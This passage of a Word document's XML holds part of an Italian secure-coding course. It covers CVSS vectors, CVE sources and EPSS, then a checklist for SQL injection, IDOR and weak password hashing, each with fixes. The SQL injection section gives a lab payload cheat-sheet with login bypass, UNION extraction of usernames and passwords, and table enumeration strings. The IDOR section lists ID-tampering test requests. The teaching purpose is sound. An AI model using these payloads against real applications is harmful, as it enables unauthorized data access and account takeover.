          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="lettura-di-un-vector-string"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Lettura di un Vector String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio Log4Shell:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si legge:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- AV:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Network (sfruttabile da Internet)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- AC:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Low (facile)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- PR:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ None (nessun privilegio richiesto)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- UI:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ None (nessuna interazione utente)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- S:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Changed (impatta altri sistemi)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- C/I/A:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">H/H/H</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ tutti High</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risultato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">10.0 Critical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— caso di scuola.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="dove-cercare-cve"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.5 Dove cercare CVE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NVD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://nvd.nist.gov/vuln/search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CVE.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://www.cve.org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Vulncheck</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://vulncheck.com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Advisories</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: https://github.com/advisories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per Python:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PyPI Advisory Database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">integrata in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="54" w:name="X95c6843a1b16a0b782718a08ca76aa8c4aae664"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.6 EPSS — Exploit Prediction Scoring System (cenno)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVSS dice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“quanto è grave”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“quanto è probabile che venga sfruttata adesso”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EPSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dice esattamente questo: probabilità che una CVE sia sfruttata nei prossimi 30 giorni (0-100%).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE generica con CVSS 7.5 ma EPSS 0.5% → bassa priorità reale.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- CVE con CVSS 7.5 ma EPSS 95% → priorità altissima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nei team di prodotto seri,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">prioritizzare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">patch usando CVSS + EPSS combinati.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Checklist + cheat-sheet per vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ogni vulnerabilità: come la identifichi, payload di test, come la correggi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">### 4.1 SQL Injection (M6.2 — 2h)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A03 Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWE-89</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Art. 5(1)(f), Art. 32</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="26" w:name="come-la-identifichi-a-vista-nel-codice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come la identifichi (a vista nel codice)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🚩 CAMPANELLI D'ALLARME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f-string + var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id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(user_id)   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># concatenazione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user_id       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># %-formatting</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cursor.execute(sql)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="27" w:name="cheat-sheet-di-payload-per-i-lab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cheat-sheet di payload (per i lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Login bypass classico</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR 1=1 --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'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</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- UNION-based extraction (numero colonne corretto)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</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT username, password, NULL FROM users --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Estrazione tabelle (MySQL/SQLite)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sqlite_master </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT table_name, NULL FROM information_schema.tables --</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Time-based (blind SQLi)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--</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Bypass quote escaping ingenuo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR \'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'=\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="28" w:name="come-correggerla"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggerla</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Query parametrizzata (SQLite)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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, (user_id,))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Query parametrizzata (PostgreSQL/psycopg2)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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* FROM users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(user_id,))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ ORM (SQLAlchemy)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User.query.filter_by(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user_id).first()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="errore-comune"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errore comune</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Filtro gli apici e i punti e virgola, sono tranquillo.”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I filtri si aggirano (encoding, whitespace, commenti). L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">unica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">difesa robusta sono le query parametrizzate. Le validation/whitelist sono difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">aggiuntiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non sostitutiva.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="difese-stratificate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04"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Query parametrizzate (mai concatenare).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ ORM (forza il pattern corretto).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Least privilege per l’utente DB della webapp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Errori generici al client (no stack trace).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ WAF (filtra payload comuni).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Logging sui pattern sospetti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">### 4.2 Broken Access Control / IDOR (M6.3 — 1,5h)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A01 Broken Access Control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWE-639, CWE-285</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Art. 32</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="come-la-identifichi"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come la identifichi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🚩 IDOR classico — manca controllo proprietario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Fattura.query.get(fid)        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># qualunque fattura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bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="32" w:name="cheat-sheet-di-test"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cheat-sheet di test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cambia ID negli URL e vedi se funziona</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /fattura/42         → vedi la tua</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /fattura/43         → vedi quella di un altro? IDOR!</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Funziona anche con UUID se l'attaccante li ottiene da altre vie</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /doc/abc123-...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Su PUT/DELETE è anche peggio</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT  /fattura/43 → modifichi quella di un altro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE /fattura/43 → cancelli quella di un altro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Su POST (creazione "per conto di")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /fattura  con body owner_id=43  → crei a nome di un altro</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="come-correggerla-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come correggerla</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Ownership check server-side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Fattura.query.get(fid)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f.owner_id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⚠️ 403, non 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  <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Pattern alternativo: filtra direttamente per owner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Fattura.query.filter_by(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fid, owner_id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).first_or_404()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bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="errore-comune-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errore comune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Nascondere ID nell’UI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“non li mostro, l’utente non sa che esistono”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Sicurezza per oscurità: l’attaccante li trova lo stesso.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Restituire 404 invece di 403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando user è autenticato ma non autorizzato. 404 ammette implicitamente che la risorsa potrebbe non esistere — confonde gli analytics e talvolta facilita enumerazione.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Confondere autenticazione con autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Login = ti riconosco. Authz = vediamo cosa puoi fare.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="difese-stratificate-1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06"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Ownership check server-side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">su ogni endpoint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✅ Filter by user nell’ORM (pattern preferito).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ 401 per non autenticato, 403 per autorizzato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Test automatici di authz (per ogni endpoint, testa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“chi NON deve poter accedere”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✅ Audit log degli accessi a risorse sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">### 4.3 Cryptographic Failures (M6.4 — 1,5h)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A02 Cryptographic Failures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CWE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CWE-328, CWE-327</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Art. 32(1)(a)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="come-la-identifichi-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Come la identifichi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🚩 Tutti questi sono catastrofici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                                          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># in chiaro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hashlib.md5(password.encode()).hexdigest()        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># MD5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hashlib.sha1(password.encode()).hexdigest()       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SHA-1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hashlib.sha256(password.encode()).hexdigest()     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
